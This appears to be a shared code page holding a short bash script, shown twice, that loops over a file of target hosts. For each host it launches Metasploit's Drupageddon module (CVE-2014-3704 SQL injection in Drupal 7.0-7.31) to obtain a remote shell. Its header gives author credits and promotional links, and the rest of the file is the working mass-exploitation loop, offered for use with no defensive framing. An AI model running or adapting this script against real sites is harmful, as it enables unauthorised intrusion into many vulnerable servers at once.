googleinurl · August 18, 2015 21:07
diff --git a/Drupal7.0-7.31.sh b/Drupal7.0-7.31.sh
 #!/bin/bash
 : '
 MINI-EXPLOIT // Metasploit->Drupal HTTP Parameter Key/Value SQL Injection
 This module exploits the Drupal HTTP Parameter Key/Value SQL Injection 
 (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. 
 This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32).

 Exploração: Drupal 7.0 - 7.31
 -----------------------------------------------------------------------
 AUTOR-SCRIPT-OTIMIZADOR:        
 Cleiton Pinheiro / Nick: googleINURL

 [+] EMAIL:        [email protected]
 [+] Blog:         http://blog.inurl.com.br
 [+] Twitter:      https://twitter.com/googleinurl
 [+] Fanpage:      https://fb.com/InurlBrasil
 [+] Pastebin      http://pastebin.com/u/Googleinurl
 [+] GIT:          https://github.com/googleinurl
 [+] PSS:          http://packetstormsecurity.com/user/googleinurl
 [+] EXA:          http://exploit4arab.net/author/248/Cleiton_Pinheiro
 [+] YOUTUBE:      http://youtube.com/c/INURLBrasil
 [+] PLUS:         http://google.com/+INURLBrasil
 -----------------------------------------------------------------------
 
 Use:
 ./Drupal7.0-7.31.sh hosts.txt
 '

 # CVE-2014-3704
 # SOURCE MODULE: 
 # http://www.rapid7.com/db/modules/exploit/multi/http/drupal_drupageddon
 # URL: https://www.drupal.org/SA-CORE-2014-005
 # URL: http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html

 echo "[+] MINI-EXPLOIT / Metasploit->(Drupal HTTP Parameter Key/Value SQL Injection) - INURL BRASIL"
 filename=$1
 filelines=`cat $filename`
 exploit='exploit/multi/http/drupal_drupageddon'
 echo "[+] [ START PROCESS ]"
 echo "[+] [EXPLOIT] $exploit"
 for line in $filelines ; do

    echo "----------------------------------------------------------------------------------"
    echo "==================================================================================" 
    echo "----------------------------------------------------------------------------------"     
    echo "[+] [ TARGET ] " $line
    echo "[!] [  exec  ]   metasploit..."
    msfconsole -x "use $exploit;set RHOST $line;exploit;exit;"

 done
	#!/bin/bash
	: '
	MINI-EXPLOIT // Metasploit->Drupal HTTP Parameter Key/Value SQL Injection
	This module exploits the Drupal HTTP Parameter Key/Value SQL Injection
	(aka Drupageddon) in order to achieve a remote shell on the vulnerable instance.
	This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32).

	Exploração: Drupal 7.0 - 7.31
	-----------------------------------------------------------------------
	AUTOR-SCRIPT-OTIMIZADOR:
	Cleiton Pinheiro / Nick: googleINURL

	[+] EMAIL: [email protected]
	[+] Blog: http://blog.inurl.com.br
	[+] Twitter: https://twitter.com/googleinurl
	[+] Fanpage: https://fb.com/InurlBrasil
	[+] Pastebin http://pastebin.com/u/Googleinurl
	[+] GIT: https://github.com/googleinurl
	[+] PSS: http://packetstormsecurity.com/user/googleinurl
	[+] EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro
	[+] YOUTUBE: http://youtube.com/c/INURLBrasil
	[+] PLUS: http://google.com/+INURLBrasil
	-----------------------------------------------------------------------

	Use:
	./Drupal7.0-7.31.sh hosts.txt
	'

	# CVE-2014-3704
	# SOURCE MODULE:
	# http://www.rapid7.com/db/modules/exploit/multi/http/drupal_drupageddon
	# URL: https://www.drupal.org/SA-CORE-2014-005
	# URL: http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html

	echo "[+] MINI-EXPLOIT / Metasploit->(Drupal HTTP Parameter Key/Value SQL Injection) - INURL BRASIL"
	filename=$1
	filelines=`cat $filename`
	exploit='exploit/multi/http/drupal_drupageddon'
	echo "[+] [ START PROCESS ]"
	echo "[+] [EXPLOIT] $exploit"
	for line in $filelines ; do

	echo "----------------------------------------------------------------------------------"
	echo "=================================================================================="
	echo "----------------------------------------------------------------------------------"
	echo "[+] [ TARGET ] " $line
	echo "[!] [ exec ] metasploit..."
	msfconsole -x "use $exploit;set RHOST $line;exploit;exit;"

	done